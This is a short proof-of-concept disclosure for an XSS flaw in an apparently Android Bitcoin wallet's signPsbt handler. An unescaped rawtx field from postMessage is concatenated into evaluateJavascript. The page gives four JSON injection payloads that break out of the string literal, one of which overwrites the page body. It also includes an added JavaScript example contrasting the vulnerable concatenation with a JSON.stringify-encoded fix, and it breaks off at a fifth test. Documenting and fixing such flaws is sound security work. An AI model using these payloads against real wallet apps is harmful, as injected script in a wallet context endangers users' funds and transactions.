🎯 Bitcoin XSS Focused PoC

🚨 Bundle.data XSS Attack Vector
This PoC exploits an XSS vulnerability in which the rawtx field from a postMessage payload is stored in bundle.data and then concatenated directly into JavaScript without sanitization.
🔍 Vulnerability Details
File: Hzv.java (Bitcoin protocol handler)
Method: aMV_() - lines 87, 122, 148
Vulnerable Code: huw.evaluateJavascript(navigationBarInfo + ".sendResponse(" + huw.getWeb3JsIdSign() + ",\"" + string + "\")", null);
Attack Vector: rawtx field → bundle.data → direct JavaScript concatenation
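Added example (not part of the original PoC or the app's code): a JavaScript model of the concatenation pattern shown above, next to a hardened builder that serialises each argument with JSON.stringify. The names bridge, buildCallConcat, buildCallEncoded and runInStubPage are hypothetical, and rawtx is a constructed sample in the shape of the Test 1 value.

```javascript
// Added example: models the Java string concatenation in JavaScript.
// "bridge" stands in for navigationBarInfo; all helper names are hypothetical.

// Mirrors the vulnerable pattern: the value is placed between hand-written quotes.
function buildCallConcat(bridgeName, id, value) {
  return bridgeName + '.sendResponse(' + id + ',"' + value + '")';
}

// Hardened: every argument is serialised as a JavaScript literal.
// JSON.stringify escapes quotes, backslashes and control characters,
// so the value cannot terminate the string it is placed in.
function buildCallEncoded(bridgeName, id, value) {
  return bridgeName + '.sendResponse(' + JSON.stringify(id) + ',' +
    JSON.stringify(String(value)) + ')';
}

// Runs a generated script against a stub bridge and a stub alert, and
// reports what the bridge received and whether any extra call executed.
function runInStubPage(script) {
  const seen = { responses: [], alerts: [] };
  const bridge = { sendResponse: (id, data) => seen.responses.push({ id, data }) };
  const alertStub = (msg) => seen.alerts.push(msg);
  new Function('bridge', 'alert', script)(bridge, alertStub);
  return seen;
}

// Constructed sample input in the shape of the page's Test 1 rawtx value.
const rawtx = '"); alert(\'XSS via signPsbt!\'); //';

function demo() {
  return {
    concat: runInStubPage(buildCallConcat('bridge', 123, rawtx)),
    encoded: runInStubPage(buildCallEncoded('bridge', 123, rawtx)),
  };
}

const result = demo();
console.log('concat  ->', JSON.stringify(result.concat));
console.log('encoded ->', JSON.stringify(result.encoded));
```

In the Java handler the corresponding encoder is org.json.JSONObject.quote(string), which returns the value already quoted and escaped, so the hand-written \" around it is dropped.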
🔸 Test 1: signPsbt Method XSS
{ "id": "123", "name": "pushPsbt", "object": { "rawtx": "\"); alert('XSS via signPsbt!'); //" } }
🔸 Test 2: signPsbts Method XSS
{ "id": "123", "name": "pushPsbt", "object": { "rawtx": "\"); alert('XSS via signPsbts!'); //" } }
🔸 Test 3: Default Case XSS
{ "id": "123", "name": "pushPsbt", "object": { "rawtx": "\"); alert('XSS via default case!'); //" } }
🔸 Test 4: Advanced XSS Payload
{ "id": "123", "name": "pushPsbt", "object": { "rawtx": "\"); alert('XSS via bundle.data!'); document.body.innerHTML='HACKED!'; //" } }
🔸 Test 5: All Methods at Once